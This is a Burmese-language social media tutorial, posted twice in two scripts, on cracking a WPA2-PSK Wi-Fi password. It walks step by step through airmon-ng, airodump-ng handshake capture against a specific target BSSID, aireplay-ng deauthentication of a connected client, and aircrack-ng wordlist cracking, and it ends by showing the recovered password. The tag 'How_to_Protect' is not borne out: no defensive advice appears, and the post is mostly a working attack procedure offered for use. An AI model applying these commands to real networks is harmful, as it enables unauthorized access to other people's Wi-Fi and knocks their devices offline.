#Hacking_WPA2PSK #How_to_Protect

zawgyi version
WPA ဆိုတာWi-Fi Protected Access 2 ျဖစ္ျပီးေတာ့ PSK ဆုိကေတာ့ pre-shared-key ပါ။ pre-shared-key ကုိသံုးျပီးေတာ့ authenticate လုပ္ပါတယ္။ personal use အတြက္ design လုပ္ေပးထားတာျဖစ္ျပီး WPA2 Personal လုိ့လဲ ေခၚပါတယ္။ သူ့ကို crack ဖုိ့အတြက္ဆုိ.. အဆင့္၄ဆင့္ command 4 ခု လုိပါတယ္။
1. Airmon-ng
2. Airodump-ng
3. Aireplay-ng
4. Aircrack-ng
ေအာက္က ပံုေလးေတြမွာ စာေရးျပီး ရွင္းျပထားပါတယ္။
Thanks for you Reading
~[F]or-get
Unicode version
WPA ဆိုတာWi-Fi Protected Access 2 ဖြစ်ပြီးတော့ PSK ဆိုကတော့ pre-shared-key ပါ။ pre-shared-key ကိုသုံးပြီးတော့ authenticate လုပ်ပါတယ်။ personal use အတွက် design လုပ်ပေးထားတာဖြစ်ပြီး WPA2 Personal လို့လဲ ခေါ်ပါတယ်။ သူ့ကို crack ဖို့အတွက်ဆို.. အဆင့်၄ဆင့် command 4 ခု လိုပါတယ်။
1. Airmon-ng
2. Airodump-ng
3. Aireplay-ng
4. Aircrack-ng
အောက်က ပုံလေးတွေမှာ စာရေးပြီး ရှင်းပြထားပါတယ်။
Thanks for you Reading
~[F]or-get
 Image may contain: text
airmon-ng ဆိုတာ က်ြန္ေတာ္တုိ့ရဲ ့wireless network interface ေတြကို monitor mode 
အျဖစ္ေျပာင္းေပးတဲ့ command ပါ
airmon-na ဆုိျပီး ဘာ parameter မွ မပါပဲ ရိုက္လိုက္ရင္ ရွိေနတဲ့ interface ေတြနဲ့ သူတုိ့ရဲ့
status ေတြကို ျပေပးမွာပါ။
airmon-ng start wlan0 ဆိုတာက wlan0 ကို mornitor mode အေနနဲ ့ ေျပာင္းမယ္လို့ ေျပာ
လိုက္တာပါ။ 
ျပီးေတာ့ Monitoring process ကို အေနွာက္အယွက္ျဖစ္နုိင္တဲ ့ program ေတြကို
kill ဖုိ့လုိပါေသးတယ္။ အဲ့အတြက္ airmon-ng check kill လုိရိုက္ခ်င္းျပီး စစ္(check)ျပီး
ုkill စရာရွိတာ kill သင့္တာ kill ဖုိ့ ေျပာလို္က္ပါတယ္။

monitor mode ျပန္ျဖဳတ္ခ်င္ရင္ airmon-ng stop wlan0mon ေနာ္ ျပီးေတာ့ 
network manager ကို ျပန္စေပးလိုက္ပါ။ service network-manger start ဆုိျပီး terminal ကေန run
ေပးလိုက္ပါ။

ကဲခုဆုိ wlan0 ဟာ monitor mode ကို ေရာက္ေနပါျပီ။

--------------------------------------------------------------

airmon-ng ဆိုတာ ကျွန်တော်တို့ရဲ ့wireless network interface တွေကို monitor mode 
အဖြစ်ပြောင်းပေးတဲ့ command ပါ
airmon-na ဆိုပြီး ဘာ parameter မှ မပါပဲ ရိုက်လိုက်ရင် ရှိနေတဲ့ interface တွေနဲ့ သူတို့ရဲ့
status တွေကို ပြပေးမှာပါ။
airmon-ng start wlan0 ဆိုတာက wlan0 ကို mornitor mode အနေနဲ ့ ပြောင်းမယ်လို့ ပြော
လိုက်တာပါ။ 
ပြီးတော့ Monitoring process ကို အနှောက်အယှက်ဖြစ်နိုင်တဲ ့ program တွေကို
kill ဖို့လိုပါသေးတယ်။ အဲ့အတွက် airmon-ng check kill လိုရိုက်ချင်းပြီး စစ်(check)ပြီး
ုkill စရာရှိတာ kill သင့်တာ kill ဖို့ ပြောလို်က်ပါတယ်။

monitor mode ပြန်ဖြုတ်ချင်ရင် airmon-ng stop wlan0mon နော် ပြီးတော့ 
network manager ကို ပြန်စပေးလိုက်ပါ။ service network-manger start ဆိုပြီး terminal ကနေ run
ပေးလိုက်ပါ။

ကဲခုဆို wlan0 ဟာ monitor mode ကို ရောက်နေပါပြီ။
Image may contain: textairodump-ng wlan0mon ဆုိျပီး ကိုယ္ဖမ္းမိေနတဲ့ wifi(AP) ေတြရဲ ့ ssid ေတြ MAC ေတြကို
scan ဖတ္ပါတယ္

-----------------------------------------------------

airodump-ng wlan0mon ဆိုပြီး ကိုယ်ဖမ်းမိနေတဲ့ wifi(AP) တွေရဲ ့ ssid တွေ MAC တွေကို
scan ဖတ်ပါတယ်
Image may contain: text
BSSID ဆိုတာက wifi လြင့္တဲ့ေကာင္ AP ရဲ့ MAC address ပါ
ESSID ဆိုတာက SSID ပါပဲ network ရဲ ့ နာမည္ပါ
ေအာက္က BSSID ရယ္ သူနဲ့ တြဲ ရက္က STATION ဆုိတာက BSSID (AP)မွာ ခ်ိတ္ေနတဲ့
client ေတြရဲ ့MAC address ေတြပါ။

ခုဆို spacex ဆိုတဲ ့ networkရယ္ SHWE MOE ဆုိတဲ ့Network ရယ္ 2ခု မိေနပါတယ္။
spacex ကို crack ျပမွာ ျဖစ္ပါတယ္။

----------------------------------------------------

BSSID ဆိုတာက wifi လွင့်တဲ့ကောင် AP ရဲ့ MAC address ပါ
ESSID ဆိုတာက SSID ပါပဲ network ရဲ ့ နာမည်ပါ
အောက်က BSSID ရယ် သူနဲ့ တွဲ ရက်က STATION ဆိုတာက BSSID (AP)မှာ ချိတ်နေတဲ့
client တွေရဲ ့MAC address တွေပါ။

ခုဆို spacex ဆိုတဲ ့ networkရယ် SHWE MOE ဆိုတဲ ့Network ရယ် 2ခု မိနေပါတယ်။
spacex ကို crack ပြမှာ ဖြစ်ပါတယ်။

Image may contain: text
airodump-ng ကို သံုးပါမယ္။ သူက WPA/WPA2 authentication handshake ေတြကို capture လုပ္ေပးနုိင္ပါတယ္။

airodump-ng -c 1 --bssid F0:C8:50:C1:69:E4 -w /home/spacex/WPA2PSK/myPSK_HASH/ wlan0mon
ဆုိတဲ့ comman မွာ
-c 1 ဆိုတာက channel 1 ပါ
--bssid xxxxxxx ဆိုျပီး ကိုယ့္ target AP ရဲ ့ MAC ကို ထည့္လုိက္ပါ
-w /location ကေတာ့ 4 way handshark ကို capture လုပ္ထားတဲ့ ဖုိင္ေတြ ထားဖုိ့ ေနရာ
ေပးလိုက္တာပါ။
လုပ္မယ့္ Interface က wlan0mon ပါ

-------------------------------------------------------

airodump-ng ကို သုံးပါမယ်။ သူက WPA/WPA2 authentication handshake တွေကို capture လုပ်ပေးနိုင်ပါတယ်။

airodump-ng -c 1 --bssid F0:C8:50:C1:69:E4 -w /home/spacex/WPA2PSK/myPSK_HASH/ wlan0mon
ဆိုတဲ့ comman မှာ
-c 1 ဆိုတာက channel 1 ပါ
--bssid xxxxxxx ဆိုပြီး ကိုယ့် target AP ရဲ ့ MAC ကို ထည့်လိုက်ပါ
-w /location ကတော့ 4 way handshark ကို capture လုပ်ထားတဲ့ ဖိုင်တွေ ထားဖို့ နေရာ
ပေးလိုက်တာပါ။
လုပ်မယ့် Interface က wlan0mon ပါ
No automatic alt text available.
okay ခုဆို ေစာင့္ႀကည့္ေနပါျပီ
client တစ္ခု ေလာက္က wifi ကို လွမ္းခ်ိတ္တာ 
authenticate လွမ္းလုပ္တာ မ်ိဳးျဖစ္ျဖစ္ လုပ္လုိက္ရင္
capture လုပ္ဖုိ့အသင့္ပါပဲ

----------------------------------------------

okay ခုဆို စောင့်ကြည့်နေပါပြီ
client တစ်ခု လောက်က wifi ကို လှမ်းချိတ်တာ 
authenticate လှမ်းလုပ်တာ မျိုးဖြစ်ဖြစ် လုပ်လိုက်ရင်
capture လုပ်ဖို့အသင့်ပါပဲ
Image may contain: text
client ေတြနဲ ့ ap ကို deauthenticate ျပဳလုပ္ေပးလိုက္ရင္ က်ြန္ေတာ္တုိ့ေတြ လိုခ်င္တဲ့
4 way handshake ဖုိင္ေလး ထြက္လာပါလိမ့္မယ္။ အဲ့အတြက္

aireplay-ng -0 10 -a F0:C8:50:C1:69:E4 -c 80:4E:81:8D:39:BB wlan0mon

-0 10 မွာ 0 က deauthenticate ကို ေျပာတာျဖစ္ျပီး 10 ကေတာ့ deauthenticate message
ပို့မယ့္အႀကိမ္ေရပါ။
-a ေနာက္က target ap MAC address ထည့္ေပးရပါတယ္
-c ေနာက္မွာ ကို deauthenticate လုပ္မယ့္ client MAC address ထည့္ေပးရပါတယ္။ အဲ့client က target BSSID ရဲ ့ station ျဖစ္ေနရမွပါ

--------------------------------------------------------------

client တွေနဲ ့ ap ကို deauthenticate ပြုလုပ်ပေးလိုက်ရင် ကျွန်တော်တို့တွေ လိုချင်တဲ့
4 way handshake ဖိုင်လေး ထွက်လာပါလိမ့်မယ်။ အဲ့အတွက်

aireplay-ng -0 10 -a F0:C8:50:C1:69:E4 -c 80:4E:81:8D:39:BB wlan0mon

-0 10 မှာ 0 က deauthenticate ကို ပြောတာဖြစ်ပြီး 10 ကတော့ deauthenticate message
ပို့မယ့်အကြိမ်ရေပါ။
-a နောက်က target ap MAC address ထည့်ပေးရပါတယ်
-c နောက်မှာ ကို deauthenticate လုပ်မယ့် client MAC address ထည့်ပေးရပါတယ်။ အဲ့client က target BSSID ရဲ ့ station ဖြစ်နေရမှပါ
Image may contain: text
client ေတြနဲ ့ ap ကို deauthenticate ျပဳလုပ္ေပးလိုက္ရင္ က်ြန္ေတာ္တုိ့ေတြ လိုခ်င္တဲ့
4 way handshake ဖုိင္ေလး ထြက္လာပါလိမ့္မယ္။ အဲ့အတြက္

aireplay-ng -0 10 -a F0:C8:50:C1:69:E4 -c 80:4E:81:8D:39:BB wlan0mon

-0 10 မွာ 0 က deauthenticate ကို ေျပာတာျဖစ္ျပီး 10 ကေတာ့ deauthenticate message
ပို့မယ့္အႀကိမ္ေရပါ။
-a ေနာက္က target ap MAC address ထည့္ေပးရပါတယ္
-c ေနာက္မွာ ကို deauthenticate လုပ္မယ့္ client MAC address ထည့္ေပးရပါတယ္။ အဲ့client က target BSSID ရဲ ့ station ျဖစ္ေနရမွပါ

--------------------------------------------------------------

client တွေနဲ ့ ap ကို deauthenticate ပြုလုပ်ပေးလိုက်ရင် ကျွန်တော်တို့တွေ လိုချင်တဲ့
4 way handshake ဖိုင်လေး ထွက်လာပါလိမ့်မယ်။ အဲ့အတွက်

aireplay-ng -0 10 -a F0:C8:50:C1:69:E4 -c 80:4E:81:8D:39:BB wlan0mon

-0 10 မှာ 0 က deauthenticate ကို ပြောတာဖြစ်ပြီး 10 ကတော့ deauthenticate message
ပို့မယ့်အကြိမ်ရေပါ။
-a နောက်က target ap MAC address ထည့်ပေးရပါတယ်
-c နောက်မှာ ကို deauthenticate လုပ်မယ့် client MAC address ထည့်ပေးရပါတယ်။ အဲ့client က target BSSID ရဲ ့ station ဖြစ်နေရမှပါ
Image may contain: textplz run until get same channel and send deauth....Image may contain: textnow we get the WPA handshakeImage may contain: text
aircrack-ng -b F0:C8:50:C1:69:E4 -w /worlist/location /handshark/for/psk /*cap

ဆုိျပီး aircrack-ng ကို သံုးျပီး ရထားတဲ့ handshake ဖိုင္နဲ့ wordlist ေတြကို တြဲျပီး
pre-shared-key ကို try ဖုိ့ပဲ က်န္ပါေတာ့တယ္
-b ေနာက္မွ target bssid ရဲ ့ MAC
-w ေနာက္က wordlist ရဲ ့ location
ျပီးေတာ့ caputer လုပ္ထားတဲ့ Handshake ဖုိင္

အဲ့တာဆုိရပါျပီ

---------------------------------------------------

aircrack-ng -b F0:C8:50:C1:69:E4 -w /worlist/location /handshark/for/psk /*cap

ဆိုပြီး aircrack-ng ကို သုံးပြီး ရထားတဲ့ handshake ဖိုင်နဲ့ wordlist တွေကို တွဲပြီး
pre-shared-key ကို try ဖို့ပဲ ကျန်ပါတော့တယ်
-b နောက်မှ target bssid ရဲ ့ MAC
-w နောက်က wordlist ရဲ ့ location
ပြီးတော့ caputer လုပ်ထားတဲ့ Handshake ဖိုင်

အဲ့တာဆိုရပါပြီ
Image may contain: textnow we can crack The PASSWORD

Mandalay@123
Image may contain: text
 

Comments